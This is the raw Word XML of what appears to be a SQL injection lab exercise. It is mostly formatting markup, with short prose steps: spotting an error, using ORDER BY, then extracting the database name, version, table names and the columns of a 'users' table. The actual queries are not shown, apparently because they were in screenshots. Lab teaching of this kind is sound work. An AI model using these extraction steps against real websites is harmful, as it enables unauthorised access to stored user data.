            <wp:docPr id="4" name="Picture 4" descr="C:\Users\HP\Documents\sqli\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Documents\sqli\Capture8.PNG"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3745230" cy="2963545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Learning Outcomes:</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After completing this exercise, you will be able to: Detect SQL Injection, You completed the following exercises: - SQL Injection Techniques, Launch a SQL Injection Attack Launch a SQL Injection Attack from command line(url).</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>In the above screenshot you can see we have got an error message which means the running site is infected by SQL injection.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Now using ORDER BY keyword to sort the records in ascending or descending order </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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Use the next query to fetch the name of the database</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Next query will extract the version of the database system</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Through the next query, we will try to fetch table name inside the database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We successfully retrieve all eight column names from inside the table users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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uli">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733B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B9733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FF3A87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BFF3A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083284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A0832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99"/>
    <w:rsid w:val="00047C28"/>
    <w:rsid w:val="00105102"/>
    <w:rsid w:val="00150873"/>
    <w:rsid w:val="00164432"/>
    <w:rsid w:val="0025571B"/>
    <w:rsid w:val="002F64A4"/>
    <w:rsid w:val="0034404D"/>
    <w:rsid w:val="00363B84"/>
    <w:rsid w:val="0037358F"/>
    <w:rsid w:val="00376F68"/>
    <w:rsid w:val="003E01A7"/>
    <w:rsid w:val="004302B0"/>
    <w:rsid w:val="004611B9"/>
    <w:rsid w:val="004D4F58"/>
    <w:rsid w:val="00510A0A"/>
    <w:rsid w:val="00557834"/>
    <w:rsid w:val="00597BA1"/>
    <w:rsid w:val="00645768"/>
    <w:rsid w:val="006D7EF4"/>
    <w:rsid w:val="006E60FE"/>
    <w:rsid w:val="006F35FD"/>
    <w:rsid w:val="006F688B"/>
    <w:rsid w:val="00707AEF"/>
    <w:rsid w:val="00725675"/>
    <w:rsid w:val="00762187"/>
    <w:rsid w:val="007F65D8"/>
    <w:rsid w:val="007F724F"/>
    <w:rsid w:val="00862BCA"/>
    <w:rsid w:val="00867DEE"/>
    <w:rsid w:val="008735C0"/>
    <w:rsid w:val="00894A07"/>
    <w:rsid w:val="00927DAD"/>
    <w:rsid w:val="00A3100D"/>
    <w:rsid w:val="00AD73A0"/>
    <w:rsid w:val="00B270C7"/>
    <w:rsid w:val="00C93D34"/>
    <w:rsid w:val="00D45816"/>
    <w:rsid w:val="00D5422E"/>
    <w:rsid w:val="00DA4306"/>
    <w:rsid w:val="00DA5804"/>
    <w:rsid w:val="00E618E6"/>
    <w:rsid w:val="00E667DD"/>
    <w:rsid w:val="00EE1C99"/>
    <w:rsid w:val="00EF6EBF"/>
    <w:rsid w:val="00F6243B"/>
    <w:rsid w:val="00F66DB4"/>
    <w:rsid w:val="00F823EA"/>
    <w:rsid w:val="00F87AF3"/>
    <w:rsid w:val="00FC23AF"/>
    <w:rsid w:val="00FC6253"/>
    <w:rsid w:val="00FD7567"/>
    <w:rsid w:val="0D1C3E42"/>
    <w:rsid w:val="17373474"/>
    <w:rsid w:val="226E68F6"/>
    <w:rsid w:val="41BF366A"/>
    <w:rsid w:val="58E77DE6"/>
    <w:rsid w:val="7AFC3C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pa-IN"/>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character" w:styleId="8">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="5"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="Heading 2 Char"/>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IN" w:eastAsia="en-IN" w:bidi="pa-IN"/>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844</Words>
  <Characters>4812</Characters>
  <Lines>40</Lines>
  <Paragraphs>11</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5645</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2022-07-30T06:09:00Z</dcterms:created>
  <dc:creator>lab</dc:creator>
  <cp:lastModifiedBy>kanis</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-03T16:05:19Z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B95D4D6B508346FD84C783940D2E1EE3</vt:lpwstr>
  </property>
</Properties>
</file>